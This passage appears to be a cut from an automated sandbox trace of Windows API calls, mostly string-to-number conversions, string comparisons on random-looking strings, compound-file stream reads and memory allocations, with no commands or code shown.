pfltOut=0x40e9f88a) returned 0x0 [0059.619] VarR8FromStr (in: strIn="60341.980924769", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.619] VarR4FromR8 (in: dblIn=0x63bc5756, pfltOut=0x40ed76bf | out: pfltOut=0x40ed76bf) returned 0x0 [0059.619] atoi (_Str="5474") returned 5474 [0059.619] atoi (_Str="17") returned 17 [0059.619] atoi (_Str="5116") returned 5116 [0059.619] atoi (_Str="5110") returned 5110 [0059.619] atoi (_Str="73") returned 73 [0059.619] atoi (_Str="5474") returned 5474 [0059.619] atoi (_Str="17") returned 17 [0059.619] atoi (_Str="5116") returned 5116 [0059.619] atoi (_Str="5110") returned 5110 [0059.619] VarR8FromStr (in: strIn="29837.904082312", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.619] VarR4FromR8 (in: dblIn=0xdc7c0ebc, pfltOut=0x40dd2379 | out: pfltOut=0x40dd2379) returned 0x0 [0059.619] atoi (_Str="1987") returned 1987 [0059.620] atoi (_Str="2003") returned 2003 [0059.620] VarR8FromStr (in: strIn="29837.904082312", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.620] VarR4FromR8 (in: dblIn=0xdc7c0ebc, pfltOut=0x40dd2379 | out: pfltOut=0x40dd2379) returned 0x0 [0059.620] atoi (_Str="178") returned 178 [0059.620] VarI4FromStr (in: strIn="29280", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.620] atoi (_Str="976") returned 976 [0059.620] atoi (_Str="5116") returned 5116 [0059.620] atoi (_Str="5110") returned 5110 [0059.620] VarI4FromStr (in: strIn="29280", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.620] atoi (_Str="976") returned 976 [0059.620] atoi (_Str="5116") returned 5116 [0059.620] atoi (_Str="5110") returned 5110 [0059.620] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Fqep6", cchCount1=-1, lpString2="yshYuFIT", cchCount2=-1) returned 1 [0059.621] VarI4FromStr (in: strIn="29357", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.621] atoi (_Str="1987") returned 1987 [0059.621] atoi (_Str="2003") returned 2003 [0059.621] VarI4FromStr (in: strIn="29357", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.621] atoi (_Str="605") returned 605 [0059.621] atoi (_Str="18") returned 18 [0059.621] VarI4FromStr (in: strIn="12888", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.622] atoi (_Str="1611") returned 1611 [0059.622] CExposedStream::Read () returned 0x0 [0059.622] CExposedStream::Read () returned 0x0 [0059.622] VarI4FromStr (in: strIn="1377319082", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.622] atoi (_Str="245") returned 245 [0059.624] atoi (_Str="605") returned 605 [0059.625] atoi (_Str="18") returned 18 [0059.625] VarI4FromStr (in: strIn="12888", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.625] atoi (_Str="1611") returned 1611 [0059.625] VarI4FromStr (in: strIn="432974510", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.625] atoi (_Str="296") returned 296 [0059.625] atoi (_Str="270") returned 270 [0059.625] VarR8FromStr (in: strIn="14374.656155399", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.625] VarR4FromR8 (in: dblIn=0xfce66de6, pfltOut=0x40cc1353 | out: pfltOut=0x40cc1353) returned 0x0 [0059.625] atoi (_Str="339") returned 339 [0059.625] atoi (_Str="362") returned 362 [0059.625] VarI4FromStr (in: strIn="12888", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.625] atoi (_Str="1611") returned 1611 [0059.625] atoi (_Str="0") returned 0 [0059.625] atoi (_Str="296") returned 296 [0059.626] atoi (_Str="270") returned 270 [0059.626] atoi (_Str="339") returned 339 [0059.626] atoi (_Str="362") returned 362 [0059.626] VarI4FromStr (in: strIn="12888", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.626] atoi (_Str="1611") returned 1611 [0059.626] VarR8FromStr (in: strIn="21924.925245713", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.626] VarR4FromR8 (in: dblIn=0x3739cb86, pfltOut=0x40d5693b | out: pfltOut=0x40d5693b) returned 0x0 [0059.626] atoi (_Str="296") returned 296 [0059.626] atoi (_Str="270") returned 270 [0059.626] atoi (_Str="0") returned 0 [0059.626] atoi (_Str="539") returned 539 [0059.626] atoi (_Str="591") returned 591 [0059.626] VarR8FromStr (in: strIn="3323.5044766209", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.626] VarR4FromR8 (in: dblIn=0x4ac278b9, pfltOut=0x40a9f702 | out: pfltOut=0x40a9f702) returned 0x0 [0059.626] atoi (_Str="300") returned 300 [0059.627] atoi (_Str="180") returned 180 [0059.627] atoi (_Str="2782") returned 2782 [0059.627] atoi (_Str="2792") returned 2792 [0059.627] atoi (_Str="300") returned 300 [0059.627] atoi (_Str="180") returned 180 [0059.627] atoi (_Str="2782") returned 2782 [0059.627] atoi (_Str="2792") returned 2792 [0059.627] VarI4FromStr (in: strIn="2056796446", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.627] atoi (_Str="1319") returned 1319 [0059.627] atoi (_Str="1340") returned 1340 [0059.627] VarI4FromStr (in: strIn="15489", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.627] atoi (_Str="8294") returned 8294 [0059.627] atoi (_Str="143") returned 143 [0059.628] atoi (_Str="221") returned 221 [0059.628] atoi (_Str="300") returned 300 [0059.628] atoi (_Str="180") returned 180 [0059.628] atoi (_Str="2782") returned 2782 [0059.628] atoi (_Str="2792") returned 2792 [0059.628] atoi (_Str="109") returned 109 [0059.628] atoi (_Str="1319") returned 1319 [0059.628] atoi (_Str="1340") returned 1340 [0059.628] atoi (_Str="0") returned 0 [0059.628] atoi (_Str="8294") returned 8294 [0059.628] atoi (_Str="143") returned 143 [0059.628] atoi (_Str="109") returned 109 [0059.628] VarR8FromStr (in: strIn="33126.468615693", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.628] VarR4FromR8 (in: dblIn=0xfee6567a, pfltOut=0x40e02cce | out: pfltOut=0x40e02cce) returned 0x0 [0059.629] atoi (_Str="736") returned 736 [0059.629] atoi (_Str="13") returned 13 [0059.629] atoi (_Str="2782") returned 2782 [0059.629] atoi (_Str="2792") returned 2792 [0059.629] VarR8FromStr (in: strIn="39531.859148434", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.629] VarR4FromR8 (in: dblIn=0x7e24db4e, pfltOut=0x40e34d7b | out: pfltOut=0x40e34d7b) returned 0x0 [0059.629] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="XVAaL", cchCount1=-1, lpString2="qVlHTJRv", cchCount2=-1) returned 3 [0059.629] atoi (_Str="357") returned 357 [0059.629] atoi (_Str="50") returned 50 [0059.629] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="XVAaL", cchCount1=-1, lpString2="qVlHTJRv", cchCount2=-1) returned 3 [0059.629] VarI4FromStr (in: strIn="14381", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.629] VarI4FromStr (in: strIn="14382", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.629] VarR8FromStr (in: strIn="47173.488327885", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.630] VarR4FromR8 (in: dblIn=0xa061ccfa, pfltOut=0x40e708af | out: pfltOut=0x40e708af) returned 0x0 [0059.630] VarI4FromStr (in: strIn="13221", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.630] atoi (_Str="117") returned 117 [0059.630] VarI4FromStr (in: strIn="14381", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.630] VarI4FromStr (in: strIn="14382", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.630] atoi (_Str="6188") returned 6188 [0059.630] atoi (_Str="221") returned 221 [0059.630] VarI4FromStr (in: strIn="13221", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.630] atoi (_Str="117") returned 117 [0059.630] VarI4FromStr (in: strIn="14381", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.630] VarI4FromStr (in: strIn="14382", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.631] VarR8FromStr (in: strIn="36464.315754126", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.631] VarR4FromR8 (in: dblIn=0x1aa86598, pfltOut=0x40e1ce0a | out: pfltOut=0x40e1ce0a) returned 0x0 [0059.631] atoi (_Str="6188") returned 6188 [0059.631] atoi (_Str="221") returned 221 [0059.631] VarR8FromStr (in: strIn="36464.315754126", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.631] VarR4FromR8 (in: dblIn=0x1aa86598, pfltOut=0x40e1ce0a | out: pfltOut=0x40e1ce0a) returned 0x0 [0059.631] atoi (_Str="665") returned 665 [0059.631] atoi (_Str="38") returned 38 [0059.631] VarI4FromStr (in: strIn="12261", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.631] VarI4FromStr (in: strIn="12262", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.631] VarR8FromStr (in: strIn="55905.116041453", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.631] VarR4FromR8 (in: dblIn=0xb69c90b4, pfltOut=0x40eb4c23 | out: pfltOut=0x40eb4c23) returned 0x0 [0059.631] atoi (_Str="698") returned 698 [0059.631] atoi (_Str="670") returned 670 [0059.632] VarI4FromStr (in: strIn="12261", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.632] VarI4FromStr (in: strIn="12262", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.632] VarI4FromStr (in: strIn="25704", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.632] atoi (_Str="1071") returned 1071 [0059.632] VarR8FromStr (in: strIn="14538.731567618", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.632] VarR4FromR8 (in: dblIn=0xa401f910, pfltOut=0x40cc655d | out: pfltOut=0x40cc655d) returned 0x0 [0059.632] atoi (_Str="665") returned 665 [0059.632] atoi (_Str="38") returned 38 [0059.632] VarI4FromStr (in: strIn="12261", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.632] VarI4FromStr (in: strIn="12262", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.632] VarR8FromStr (in: strIn="59668.04206285", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.632] VarR4FromR8 (in: dblIn=0x589430a4, pfltOut=0x40ed2281 | out: pfltOut=0x40ed2281) returned 0x0 [0059.632] VarI4FromStr (in: strIn="25704", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.633] atoi (_Str="1071") returned 1071 [0059.633] VarI4FromStr (in: strIn="1173488958", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.633] VarI4FromStr (in: strIn="1173488958", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.633] atoi (_Str="997") returned 997 [0059.633] atoi (_Str="34") returned 34 [0059.633] CRetailMalloc_Realloc () returned 0x7757f48 [0059.633] VarI4FromStr (in: strIn="11466", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.633] atoi (_Str="1274") returned 1274 [0059.633] VarR8FromStr (in: strIn="63736.208979324", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.633] VarR4FromR8 (in: dblIn=0xaff56844, pfltOut=0x40ef1f06 | out: pfltOut=0x40ef1f06) returned 0x0 [0059.633] VarI4FromStr (in: strIn="17394", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.633] atoi (_Str="669") returned 669 [0059.634] VarR8FromStr (in: strIn="63736.208979324", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.634] VarR4FromR8 (in: dblIn=0xaff56844, pfltOut=0x40ef1f06 | out: pfltOut=0x40ef1f06) returned 0x0 [0059.634] VarR8FromStr (in: strIn="53741.909580505", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.634] VarR4FromR8 (in: dblIn=0x1b489342, pfltOut=0x40ea3dbd | out: pfltOut=0x40ea3dbd) returned 0x0 [0059.634] atoi (_Str="997") returned 997 [0059.634] atoi (_Str="34") returned 34 [0059.634] VarI4FromStr (in: strIn="11466", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.634] atoi (_Str="1274") returned 1274 [0059.634] atoi (_Str="3861") returned 3861 [0059.634] VarI4FromStr (in: strIn="17394", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.634] atoi (_Str="669") returned 669 [0059.634] VarI4FromStr (in: strIn="25410", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.635] atoi (_Str="385") returned 385 [0059.635] VarI4FromStr (in: strIn="11466", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.635] atoi (_Str="1274") returned 1274 [0059.635] atoi (_Str="4364") returned 4364 [0059.635] VarI4FromStr (in: strIn="17394", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.635] atoi (_Str="669") returned 669 [0059.635] atoi (_Str="0") returned 0 [0059.635] atoi (_Str="613") returned 613 [0059.635] atoi (_Str="577") returned 577 [0059.635] VarR8FromStr (in: strIn="41359.30073466", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.635] VarR4FromR8 (in: dblIn=0x9f9e4b2f, pfltOut=0x40e431e9 | out: pfltOut=0x40e431e9) returned 0x0 [0059.635] atoi (_Str="196") returned 196 [0059.635] atoi (_Str="260") returned 260 [0059.636] atoi (_Str="8672") returned 8672 [0059.636] atoi (_Str="1084") returned 1084 [0059.636] atoi (_Str="130") returned 130 [0059.636] atoi (_Str="635") returned 635 [0059.636] atoi (_Str="657") returned 657 [0059.636] VarR8FromStr (in: strIn="44964.425936986", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.636] VarR4FromR8 (in: dblIn=0xa1469a21, pfltOut=0x40e5f48d | out: pfltOut=0x40e5f48d) returned 0x0 [0059.636] atoi (_Str="196") returned 196 [0059.636] atoi (_Str="260") returned 260 [0059.636] atoi (_Str="8672") returned 8672 [0059.636] atoi (_Str="1084") returned 1084 [0059.636] atoi (_Str="30") returned 30 [0059.636] atoi (_Str="635") returned 635 [0059.636] atoi (_Str="657") returned 657 [0059.637] VarR8FromStr (in: strIn="4321.7112265159", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.637] VarR4FromR8 (in: dblIn=0x12f0e1d7, pfltOut=0x40b0e1b6 | out: pfltOut=0x40b0e1b6) returned 0x0 [0059.637] atoi (_Str="559") returned 559 [0059.637] atoi (_Str="4") returned 4 [0059.637] atoi (_Str="8672") returned 8672 [0059.637] atoi (_Str="1084") returned 1084 [0059.637] VarR8FromStr (in: strIn="551.36924141674", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.637] VarR4FromR8 (in: dblIn=0x34d809d1, pfltOut=0x40813af4 | out: pfltOut=0x40813af4) returned 0x0 [0059.638] VarR8FromStr (in: strIn="551.36924141674", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.638] VarR4FromR8 (in: dblIn=0x34d809d1, pfltOut=0x40813af4 | out: pfltOut=0x40813af4) returned 0x0 [0059.638] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="iVC5y", cchCount1=-1, lpString2="QHJjZ9", cchCount2=-1) returned 1 [0059.638] VarI4FromStr (in: strIn="14280", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.638] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="iVC5y", cchCount1=-1, lpString2="QHJjZ9", cchCount2=-1) returned 1 [0059.638] VarI4FromStr (in: strIn="1447320082", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.638] VarR8FromStr (in: strIn="41078.3502716", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.638] VarR4FromR8 (in: dblIn=0x356cc957, pfltOut=0x40e40ecb | out: pfltOut=0x40e40ecb) returned 0x0 [0059.638] VarR8FromStr (in: strIn="41078.3502716", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.638] VarR4FromR8 (in: dblIn=0x356cc957, pfltOut=0x40e40ecb | out: pfltOut=0x40e40ecb) returned 0x0 [0059.639] VarR8FromStr (in: strIn="4474.6797217311", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.639] VarR4FromR8 (in: dblIn=0x23e4d74, pfltOut=0x40b17aae | out: pfltOut=0x40b17aae) returned 0x0 [0059.639] CExposedStream::Read () returned 0x0 [0059.639] CExposedStream::Read () returned 0x0 [0059.639] VarR8FromStr (in: strIn="49033.51511114", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.639] VarR4FromR8 (in: dblIn=0x7bca5b83, pfltOut=0x40e7f130 | out: pfltOut=0x40e7f130) returned 0x0 [0059.639] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Gz5bvUy7E", cchCount1=-1, lpString2="tKTELJW", cchCount2=-1) returned 1 [0059.639] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Gz5bvUy7E", cchCount1=-1, lpString2="tKTELJW", cchCount2=-1) returned 1 [0059.639] VarR8FromStr (in: strIn="54488.107778799", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.639] VarR4FromR8 (in: dblIn=0x72ec861d, pfltOut=0x40ea9b03 | out: pfltOut=0x40ea9b03) returned 0x0 [0059.639] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="WkBDLdsmW" | out: _Dst="WkBDLdsmW") returned 0x0 [0059.640] CExposedStream::Read () returned 0x0 [0059.640] CRetailMalloc_Realloc () returned 0x8898da8 [0059.640] CExposedStream::Release () returned 0x1 [0059.640] CExposedStream::Release () returned 0x0 [0059.640] CRetailMalloc_Realloc () returned 0x8750160 [0059.640] CRetailMalloc_Alloc () returned 0x8842120 [0059.641] CRetailMalloc_Alloc () returned 0x6178d88 [0059.641] CRetailMalloc_Alloc () returned 0x867b3c8 [0059.641] CRetailMalloc_Realloc () returned 0x7687510 [0059.641] CRetailMalloc_Realloc () returned 0x880dc50 [0059.641] CRetailMalloc_Realloc () returned 0x8809b80 [0059.641] CRetailMalloc_Realloc () returned 0x8769848 [0059.642] CRetailMalloc_Realloc () returned 0x880f9f8 [0059.642] CRetailMalloc_Alloc () returned 0x87f3788 [0059.642] CRetailMalloc_Free () returned 0xf20001 [0059.642] CRetailMalloc_Alloc () returned 0x880fca0 [0059.642] CRetailMalloc_Realloc () returned 0x8738f98 [0059.642] CRetailMalloc_Free () returned 0x920001 [0059.642] CRetailMalloc_Alloc () returned 0x887ba20 [0059.642] CRetailMalloc_Alloc () returned 0x880fca0 [0059.642] CRetailMalloc_Alloc () returned 0x87fb9c0 [0059.642] CRetailMalloc_Alloc () returned 0x87ebb88 [0059.642] CRetailMalloc_Alloc () returned 0x86e6078 [0059.642] CRetailMalloc_Alloc () returned 0x86e6088 [0059.642] CRetailMalloc_Alloc () returned 0x876c658 [0059.643] CRetailMalloc_Free () returned 0xec0001 [0059.643] CExposedDocFile::AddRef () returned 0x7 [0059.643] CExposedDocFile::OpenStream () returned 0x0 [0059.643] CExposedDocFile::Release () returned 0x7 [0059.643] CExposedStream::Seek () returned 0x0 [0059.643] CRetailMalloc_Alloc () returned 0x887c950 [0059.643] CRetailMalloc_Alloc () returned 0x87ebc98 [0059.643] CRetailMalloc_Alloc () returned 0x887cf70 [0059.643] CRetailMalloc_Alloc () returned 0x8811438 [0059.643] CRetailMalloc_Alloc () returned 0x86e6098 [0059.643] CRetailMalloc_Alloc () returned 0x86e60a8 [0059.643] CRetailMalloc_Alloc () returned 0x8811528 [0059.643] CRetailMalloc_Alloc () returned 0x87ebd20 [0059.643] CExposedStream::AddRef () returned 0x2 [0059.643] CExposedStream::Read () returned 0x0 [0059.643] CExposedStream::AddRef () returned 0x3 [0059.644] CExposedStream::Release () returned 0x2 [0059.644] CRetailMalloc_Alloc () returned 0x888ca48 [0059.644] CExposedStream::Read () returned 0x0 [0059.644] CExposedStream::Read () returned 0x0 [0059.644] CRetailMalloc_Alloc () returned 0x86e60b8 [0059.644] CRetailMalloc_Alloc () returned 0x87fc4b8 [0059.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x86e60b8, cbMultiByte=8, lpWideCharStr=0x87fc4b8, cchWideChar=8 | out: lpWideCharStr="SDWYuI6") returned 8 [0059.644] CRetailMalloc_Free () returned 0x3b60201 [0059.644] CRetailMalloc_Free () returned 0x6650301 [0059.644] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="qsuOJ", cchCount1=-1, lpString2="UkqurTJ6a", cchCount2=-1) returned 1 [0059.645] VarI4FromStr (in: strIn="31605", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.645] atoi (_Str="645") returned 645 [0059.645] atoi (_Str="1496") returned 1496 [0059.645] atoi (_Str="1503") returned 1503 [0059.645] VarI4FromStr (in: strIn="14872", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.645] atoi (_Str="572") returned 572 [0059.646] VarI4FromStr (in: strIn="10976", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.646] atoi (_Str="224") returned 224 [0059.646] VarR8FromStr (in: strIn="40997.183600197", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.646] VarR4FromR8 (in: dblIn=0xe00d8535, pfltOut=0x40e404a5 | out: pfltOut=0x40e404a5) returned 0x0 [0059.646] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="zBl6xibT", cchCount1=-1, lpString2="mtLKiT9k", cchCount2=-1) returned 3 [0059.646] VarR8FromStr (in: strIn="2775.4121170272", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.646] VarR4FromR8 (in: dblIn=0x100c3e6, pfltOut=0x40a5aed3 | out: pfltOut=0x40a5aed3) returned 0x0 [0059.647] CRetailMalloc_Realloc () returned 0x779d1d8 [0059.647] VarI4FromStr (in: strIn="31605", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.647] atoi (_Str="645") returned 645 [0059.647] atoi (_Str="1496") returned 1496 [0059.647] atoi (_Str="1503") returned 1503 [0059.647] VarR8FromStr (in: strIn="58337.941381469", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.647] VarR4FromR8 (in: dblIn=0x1fcc07cd, pfltOut=0x40ec7c3e | out: pfltOut=0x40ec7c3e) returned 0x0 [0059.648] VarI4FromStr (in: strIn="14872", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.648] atoi (_Str="572") returned 572 [0059.648] VarI4FromStr (in: strIn="30758", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.648] VarI4FromStr (in: strIn="10976", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.648] atoi (_Str="224") returned 224 [0059.648] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="YMN8tr1U0", cchCount1=-1, lpString2="cwlrM0", cchCount2=-1) returned 3 [0059.648] VarI4FromStr (in: strIn="30758", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.648] CRetailMalloc_Realloc () returned 0x87161d8 [0059.649] VarI4FromStr (in: strIn="30758", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.649] atoi (_Str="785") returned 785 [0059.649] atoi (_Str="9") returned 9 [0059.649] atoi (_Str="1496") returned 1496 [0059.649] atoi (_Str="1503") returned 1503 [0059.649] atoi (_Str="2") returned 2 [0059.650] VarI4FromStr (in: strIn="1071226506", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.650] atoi (_Str="785") returned 785 [0059.650] atoi (_Str="9") returned 9 [0059.650] atoi (_Str="1496") returned 1496 [0059.650] atoi (_Str="1503") returned 1503 [0059.650] VarR8FromStr (in: strIn="48957.598024083", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.650] VarR4FromR8 (in: dblIn=0x230366d7, pfltOut=0x40e7e7b3 | out: pfltOut=0x40e7e7b3) returned 0x0 [0059.651] atoi (_Str="71") returned 71 [0059.651] atoi (_Str="22") returned 22 [0059.651] atoi (_Str="2415") returned 2415 [0059.651] atoi (_Str="2421") returned 2421 [0059.651] VarR8FromStr (in: strIn="63293.668661888", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.651] VarR4FromR8 (in: dblIn=0x65ad9da1, pfltOut=0x40eee7b5 | out: pfltOut=0x40eee7b5) returned 0x0 [0059.651] CRetailMalloc_Realloc () returned 0x6210a88 [0059.652] atoi (_Str="349") returned 349 [0059.652] atoi (_Str="375") returned 375 [0059.652] atoi (_Str="96") returned 96 [0059.652] atoi (_Str="71") returned 71 [0059.652] atoi (_Str="22") returned 22 [0059.653] atoi (_Str="2415") returned 2415 [0059.653] atoi (_Str="2421") returned 2421 [0059.653] atoi (_Str="149") returned 149 [0059.654] atoi (_Str="349") returned 349 [0059.654] atoi (_Str="375") returned 375 [0059.654] atoi (_Str="71") returned 71 [0059.654] atoi (_Str="22") returned 22 [0059.654] atoi (_Str="2415") returned 2415 [0059.654] atoi (_Str="2421") returned 2421 [0059.654] atoi (_Str="1141") returned 1141 [0059.655] atoi (_Str="349") returned 349 [0059.655] atoi (_Str="375") returned 375 [0059.655] atoi (_Str="135") returned 135 [0059.655] atoi (_Str="81") returned 81 [0059.655] atoi (_Str="131") returned 131 [0059.655] VarR8FromStr (in: strIn="32649.412375022", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.655] VarR4FromR8 (in: 